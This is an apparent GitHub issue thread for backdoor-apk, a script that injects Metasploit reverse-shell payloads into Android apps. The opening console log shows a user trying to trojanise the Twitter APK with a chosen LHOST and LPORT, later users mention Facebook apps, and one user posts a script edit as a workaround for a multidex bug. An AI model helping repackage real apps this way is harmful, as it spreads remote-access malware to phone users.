dana-at-cp / backdoor-apk

backdoor-apk is a shell script that simplifies the process of adding a backdoor to any Android APK file. Users of this shell script should have working knowledge of Linux, Bash, Metasploit, Apktool, the Android SDK, smali, etc. This shell script is provided as-is without warranty of any kind and is intended for educational purposes only.
Apache License 2.0

Failed to locate smali file to hook in multidex APK #75

Closed LuisMayo closed 7 years ago

LuisMayo commented 7 years ago

I was just trying this with the Twitter APK but it didn't work:

Console output:

root@kali:~/android-backdoor/backdoor-apk/backdoor-apk# ./backdoor-apk.sh twitter-6-32-0.apk


     / ______ \
     || _  _ ||
     ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
     |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
     || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
     ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
     |||_||_|||         AAA  AAA  PPP       KKK  KKK
     ||______||         AAA  AAA  PPP       KKK  KKK
    /__________\

____|__|__ /____\ |____| Dana James Traversie

[] Running backdoor-apk.sh v0.1.9 on vie feb 3 16:28:59 CET 2017
[+] Android payload options:
1) meterpreter/reverse_http    4) shell/reverse_http
2) meterpreter/reverse_https   5) shell/reverse_https
3) meterpreter/reverse_tcp     6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: 192.168.0.207
[?] Please enter an LPORT value: 7777
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[] Generating RAT APK file...done.
[] Decompiling RAT APK file...done.
[] Decompiling original APK file...done.
[] Merging permissions of original and payload projects...done.
[] Running proguard on RAT APK file...done.
[] Decompiling obfuscated RAT APK file...done.
[] Creating new directories in original project for RAT smali files...done.
[] Copying RAT smali files to new directories in original project...done.
[] Fixing RAT smali files...done.
[] Obfuscating const-string values in RAT smali files...done.
[] Locating smali file to hook in original project...done.
[!] Failed to locate smali file to hook

run.log contents: https://ghostbin.com/paste/uqh5o

I'm going to try with a different APK just for testing.

Regards.

Abdulmalik5371 commented 7 years ago

I have the same issue when trying to backdoor the Facebook APK and also the Facebook Messenger app... kindly help

dana-at-cp commented 7 years ago

@TLuigi003 I confirmed this is a bug that is reproducible with the Twitter APK.

@Abdulmalik5371 I'm not sure about Facebook APKs at this time but I bet it's the same issue. I'll confirm soon.

Thanks for the reports.

Abdulmalik5371 commented 7 years ago

@dana-at-cp thanks for the early response... I appreciate it.

dana-at-cp commented 7 years ago

The problem is that the current code correctly identifies the smali file to hook via the AndroidManifest.xml file but fails to search all of the smali file class directories.

For example, the Twitter APK decompiles into three smali file class directories:

  1. smali
  2. smali_classes2
  3. smali_classes3

The current code searches the 'smali' directory for the expected smali file but it actually exists in the 'smali_classes2' directory.

This bug affects any multidex APK where the smali file to hook is not in the 'smali' directory.

More on multidex APKs: https://developer.android.com/studio/build/multidex.html

y3lin4ung commented 7 years ago

I am not sure about your answer, Mr. dana-at-cp. How do we pass that "fail to locate smali file to hook" error? Thx!

LuisMayo commented 7 years ago

@YaRMa not a fix but a workaround may be changing the line 441 of the backdoor-apk.sh from

    smali_file_to_hook=$MY_PATH/original/smali/$total_package$tmp.smali

to

    smali_file_to_hook=$MY_PATH/original/smali_classes2/$total_package$tmp.smali

(It may differ in the case of facebook apk)

I haven't tested this but I would try that while we wait for a proper solution

Regards.

LuisMayo commented 7 years ago

@YaRMa It doesn't work. After replacing every reference to smali with smali_classes2 the script continues, but it fails at recompiling the original project. So probably we need to wait until a proper patch is done.

Or make it ourselves :P

dana-at-cp commented 7 years ago

@TLuigi003 @YaRMa Simply replacing every instance of "smali" with "smali_classes2" is not the proper fix and undoubtedly resulted in other breakage. Hang tight. I'll have a new release out soon.

dana-at-cp commented 7 years ago

@TLuigi003 @YaRMa I have a fix created. I'll cut a new release in the next day or so.

defcony commented 7 years ago

Where can I find the patch?

dana-at-cp commented 7 years ago

@defcony A new version is coming ... I've been busy with other things unfortunately.

dana-at-cp commented 7 years ago

@TLuigi003 @Abdulmalik5371 @YaRMa @defcony This bug is now fixed on master.

glenn2148 commented 6 years ago

looks like it never came, lol

empt1xo commented 6 years ago

seems like they forgot to fix this 🤔, lol

irfankhan090 commented 5 years ago

I'm still waiting after 2 years.

LuisMayo commented 5 years ago

I didn't get to try again if it was indeed fixed. I can't believe it has already been 2 years. I'll check when I have time.

delgiu87 commented 4 years ago

Someone fix the problem? Still now same error. We lose time to follow fake sw?

MrFey commented 4 years ago

UP!

ll3N1GmAll commented 4 years ago

Still seeing this issue on numerous apks